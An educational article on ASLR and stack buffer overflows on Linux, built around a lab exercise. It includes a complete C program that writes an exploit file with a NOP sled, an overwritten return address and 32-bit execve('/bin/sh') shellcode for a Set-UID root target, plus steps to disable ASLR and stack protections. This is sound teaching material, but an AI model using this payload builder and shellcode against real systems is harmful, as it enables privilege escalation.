Understanding ASLR and Buffer Overflow Exploits on Linux
This article explains the concept of Address Space Layout Randomization (ASLR), illustrates how buffer overflow attacks work on Linux, shows step‑by‑step exploitation with disabled ASLR, analyzes memory layout calculations, and discusses the impact of PIE and modern mitigation techniques.
Address Space Layout Randomization (ASLR) is a security technique that randomizes the base addresses of a process's memory regions (stack, heap, shared libraries and, for position‑independent executables, the program image itself) so that an attacker cannot know in advance where injected code or useful data will be. The article begins with a brief definition of ASLR and its purpose.
It then reviews the Linux process address space, describing the order of regions from low to high addresses: code and data, heap, shared libraries, user stack, and kernel space. The user stack grows downward toward lower addresses, but writes into a stack buffer proceed upward, so an overlong copy runs past the buffer into the saved frame pointer and the saved return address above it and can hijack control flow when the function returns.
A concrete buffer‑overflow example is presented, based on a lab exercise. The vulnerable program stack.c contains a function bof that copies an input string into a fixed‑size buffer using strcpy, which performs no bounds check. When the input exceeds BUF_SIZE, the overflow overwrites the saved frame pointer and the saved return address.
The article shows how to disable ASLR on Linux (setting kernel.randomize_va_space to 0), compile the program with -z execstack and -fno-stack-protector so that the stack is executable and no canary guards the return address, and then craft a malicious payload (badfile) that contains shellcode and the target address 0xbfffee2b, a 32‑bit stack address. Running the program with the payload gains root privileges; this depends on the program being a Set‑UID root binary, since the same overflow against an ordinary binary only yields a shell with the invoking user's privileges.
Detailed address calculations are explained: using GDB to find the address of the buffer and the saved frame pointer, computing the offset from the buffer to the return address (48 bytes here; the return address sits at ebp + 4, so the offset is ebp + 4 minus the buffer address), and determining the address where the shellcode resides so the overwritten return address lands on it (in practice, anywhere in the NOP padding that precedes it). Memory layout diagrams illustrate the buffer, saved frame pointer, and return address positions.
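As an added example (not the article's code), the following C program builds the badfile described above: a NOP sled, the return address written little‑endian at the computed offset, and the shellcode at the end, with the geometry checks a practitioner would want before running the Set‑UID target. It assumes the SEED lab's 517‑byte badfile size, uses the article's reported offset (48) and target address (0xbfffee2b), and substitutes the standard 32‑bit Linux execve("/bin/sh") shellcode for whatever bytes the article used. The buffer and ebp addresses in the comments are hypothetical values chosen to be consistent with those two numbers, since the article's own GDB output is not reproduced here.

```c
/* Added example, not the article's code: generate the badfile for the
 * 32-bit, ASLR-off, executable-stack bof() target described in the text.
 * Layout:  [NOP sled][return address at ret_off][NOP sled][shellcode]
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BADFILE_SIZE 517u            /* assumption: SEED lab badfile size */
#define ARTICLE_RET_OFFSET 48u       /* offset the article computes in GDB */
#define ARTICLE_TARGET 0xbfffee2bu   /* address the article writes into badfile */

/* Standard 32-bit Linux execve("/bin/sh", ["/bin/sh"], NULL) shellcode
 * (not the article's exact bytes):
 * xor eax,eax; push eax; push "//sh"; push "/bin"; mov ebx,esp;
 * push eax; push ebx; mov ecx,esp; cdq; mov al,11; int 0x80 */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)  /* drop the literal's trailing NUL */

/* Offset from &buffer to the saved return address. The return address sits
 * directly above the saved frame pointer, i.e. at ebp + 4, so
 * offset = (ebp + 4) - &buffer. Both inputs come from a GDB session. */
uint32_t ret_offset(uint32_t buffer_addr, uint32_t ebp) {
    return ebp + 4 - buffer_addr;
}

/* 1 if `target` lands inside the NOP sled: above the return-address slot and
 * no later than the first shellcode byte. Anything else returns or jumps into
 * garbage. */
int target_in_sled(uint32_t buffer_addr, uint32_t ret_off, uint32_t target, size_t size) {
    uint32_t sled_start = buffer_addr + ret_off + 4;
    uint32_t sled_end   = buffer_addr + (uint32_t)(size - SHELLCODE_LEN);
    return target >= sled_start && target <= sled_end;
}

/* Fill `out` (size bytes) with the payload. Returns 0 on success, -1 if the
 * geometry does not fit, -2 if the payload would contain a NUL byte, which
 * would stop strcpy() before the return address is reached. */
int build_payload(unsigned char *out, size_t size, uint32_t ret_off, uint32_t target) {
    if (size < SHELLCODE_LEN || ret_off + 4 > size - SHELLCODE_LEN)
        return -1;
    memset(out, 0x90, size);                                  /* NOP sled */
    memcpy(out + size - SHELLCODE_LEN, shellcode, SHELLCODE_LEN);
    out[ret_off]     = (unsigned char)(target & 0xff);         /* little-endian */
    out[ret_off + 1] = (unsigned char)((target >> 8) & 0xff);
    out[ret_off + 2] = (unsigned char)((target >> 16) & 0xff);
    out[ret_off + 3] = (unsigned char)((target >> 24) & 0xff);
    for (size_t i = 0; i < size; i++)
        if (out[i] == 0)
            return -2;
    return 0;
}

/* Convenience wrappers that build into a static buffer so the result can be
 * inspected byte by byte without the caller owning an array. */
static unsigned char scratch[BADFILE_SIZE];

int payload_status(uint32_t ret_off, uint32_t target) {
    return build_payload(scratch, BADFILE_SIZE, ret_off, target);
}

int article_payload_byte(size_t index) {
    if (index >= BADFILE_SIZE ||
        payload_status(ARTICLE_RET_OFFSET, ARTICLE_TARGET) != 0)
        return -1;
    return scratch[index];
}

int main(void) {
    /* Hypothetical GDB observations consistent with the article's numbers:
     * &buffer = 0xbfffecd0, $ebp = 0xbfffecfc  ->  offset 48, target in sled. */
    uint32_t buf = 0xbfffecd0u, ebp = 0xbfffecfcu;
    uint32_t off = ret_offset(buf, ebp);
    if (!target_in_sled(buf, off, ARTICLE_TARGET, BADFILE_SIZE)) {
        fprintf(stderr, "target 0x%08x misses the NOP sled\n", ARTICLE_TARGET);
        return 1;
    }
    unsigned char payload[BADFILE_SIZE];
    if (build_payload(payload, BADFILE_SIZE, off, ARTICLE_TARGET) != 0) {
        fprintf(stderr, "payload geometry invalid or contains NUL\n");
        return 1;
    }
    FILE *f = fopen("badfile", "wb");
    if (!f) { perror("badfile"); return 1; }
    fwrite(payload, 1, BADFILE_SIZE, f);
    fclose(f);
    return 0;
}
```

Under the lab's setup (ASLR off via sysctl, the target built with gcc -m32 -z execstack -fno-stack-protector and made Set‑UID root) the generated badfile is read by stack and the overflow returns into the sled. Addresses seen inside GDB are typically a few bytes off from those outside it because the debugger adds environment variables that shift the stack; the NOP sled exists precisely to absorb that difference, which is why the target is checked against the sled range rather than required to equal the shellcode's start.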
The article also demonstrates the effect of ASLR by running a simple program (print_heap.c) with ASLR enabled and disabled, showing that heap addresses change from run to run when randomization is on and stay fixed when it is off.
Further discussion covers Position‑Independent Executables (PIE) on macOS, how PIE interacts with ASLR (only a position‑independent image can be loaded at a randomized base), and why disabling PIE still leaves some randomization: only the executable's own load address becomes fixed, while the stack, heap and shared libraries are still slid. Screenshots illustrate the Mach‑O header flags (MH_PIE) and the resulting address slides.
In the summary, the author notes that while ASLR does not completely prevent buffer‑overflow attacks, it significantly raises the difficulty, especially on 64‑bit systems where the randomization range is large.
Author information and a reference to the textbook "Computer Systems: A Programmer's Perspective" are provided, followed by links to related reading.
58 Tech